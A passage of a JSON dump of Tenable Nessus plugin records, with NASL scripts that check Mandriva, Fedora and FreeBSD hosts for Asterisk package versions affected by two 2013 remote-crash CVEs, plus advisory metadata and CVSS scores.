script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-fax\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-festival\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ices\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-jabber\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-jack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-lua\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-minivm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mobile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mp3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ooh323\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-osp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-oss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-pktccops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-portaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-radius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-saycountpl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-skinny\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-speex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-tds\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-unistim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-plain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64asteriskssl1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif 
(isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-addons-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-devel-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-firmware-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-gui-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-alsa-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-calendar-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-cel-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-corosync-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-curl-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-dahdi-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-fax-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-festival-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ices-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-jabber-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-jack-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", 
cpu:\"x86_64\", reference:\"asterisk-plugins-ldap-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-lua-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-minivm-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mobile-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mp3-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mysql-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ooh323-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-osp-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-oss-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-pgsql-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-pktccops-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-portaudio-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-radius-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-saycountpl-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-skinny-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-snmp-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-speex-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", 
reference:\"asterisk-plugins-sqlite-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-tds-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-unistim-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-imap-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-plain-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64asteriskssl1-11.5.1-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:58:48", "description": "- Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.5.1-2 :\n\n - Enable hardened build BZ#954338\n\n - Significant clean ups\n\n - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.5.1-1 :\n\n - The Asterisk Development Team has announced security releases for Certified\n\n - Asterisk 1.8.15, 11.2, and Asterisk 1.8, 10, and 11.\n The available security releases\n\n - are released as versions 1.8.15-cert2, 11.2-cert2, 1.8.23.1, 10.12.3, 10.12.3-digiumphones,\n\n - and 11.5.1.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-09-14T00:00:00", "type": "nessus", "title": "Fedora 18 : asterisk-11.5.1-2.fc18 (2013-15567)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:18"], "id": "FEDORA_2013-15567.NASL", "href": "https://www.tenable.com/plugins/nessus/69887", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-15567.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69887);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_bugtraq_id(62021, 62022);\n script_xref(name:\"FEDORA\", value:\"2013-15567\");\n\n script_name(english:\"Fedora 18 : asterisk-11.5.1-2.fc18 (2013-15567)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.5.1-2 :\n\n - Enable 
hardened build BZ#954338\n\n - Significant clean ups\n\n - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.5.1-1 :\n\n - The Asterisk Development Team has announced security\n releases for Certified\n\n - Asterisk 1.8.15, 11.2, and Asterisk 1.8, 10, and 11.\n The available security releases\n\n - are released as versions 1.8.15-cert2, 11.2-cert2,\n 1.8.23.1, 10.12.3, 10.12.3-digiumphones,\n\n - and 11.5.1.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1002044\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115639.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4f6d185d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n 
script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"asterisk-11.5.1-2.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:57:01", "description": "The Asterisk project reports :\n\nRemote Crash From Late Arriving SIP ACK With SDP\n\nRemote Crash when Invalid SDP is sent in SIP Request", "cvss3": {}, "published": "2013-08-29T00:00:00", "type": "nessus", "title": "FreeBSD : asterisk -- multiple vulnerabilities (fd2bf3b5-1001-11e3-ba94-0025905a4771)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:asterisk10", "p-cpe:/a:freebsd:freebsd:asterisk11", "p-cpe:/a:freebsd:freebsd:asterisk18", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_FD2BF3B5100111E3BA940025905A4771.NASL", "href": "https://www.tenable.com/plugins/nessus/69499", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69499);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n\n script_name(english:\"FreeBSD : asterisk -- multiple vulnerabilities (fd2bf3b5-1001-11e3-ba94-0025905a4771)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk project reports :\n\nRemote Crash From Late Arriving SIP ACK With SDP\n\nRemote Crash when Invalid SDP is sent in SIP Request\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-004.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-005.html\"\n );\n # https://www.asterisk.org/security\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.asterisk.org/downloads/security-advisories\"\n );\n # https://vuxml.freebsd.org/freebsd/fd2bf3b5-1001-11e3-ba94-0025905a4771.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?094717d7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk18\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"asterisk11>11.*<11.5.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk10>10.*<10.12.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk18>1.8.*<1.8.21.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:59:37", "description": "- Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.5.1-2 :\n\n - Enable hardened build BZ#954338\n\n - Significant clean ups\n\n - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.5.1-1 :\n\n - The Asterisk Development Team has announced security releases for Certified\n\n - Asterisk 1.8.15, 11.2, and Asterisk 1.8, 10, and 11.\n The available security releases\n\n - are released as versions 1.8.15-cert2, 11.2-cert2, 1.8.23.1, 10.12.3, 10.12.3-digiumphones,\n\n - and 11.5.1.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-09-14T00:00:00", "type": "nessus", "title": "Fedora 19 : asterisk-11.5.1-2.fc19 (2013-15560)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2013-15560.NASL", "href": "https://www.tenable.com/plugins/nessus/69886", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-15560.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69886);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_bugtraq_id(62021, 62022);\n script_xref(name:\"FEDORA\", value:\"2013-15560\");\n\n script_name(english:\"Fedora 19 : asterisk-11.5.1-2.fc19 (2013-15560)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.5.1-2 :\n\n - Enable 
hardened build BZ#954338\n\n - Significant clean ups\n\n - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.5.1-1 :\n\n - The Asterisk Development Team has announced security\n releases for Certified\n\n - Asterisk 1.8.15, 11.2, and Asterisk 1.8, 10, and 11.\n The available security releases\n\n - are released as versions 1.8.15-cert2, 11.2-cert2,\n 1.8.23.1, 10.12.3, 10.12.3-digiumphones,\n\n - and 11.5.1.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1002044\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115650.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?552696dd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n 
script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ 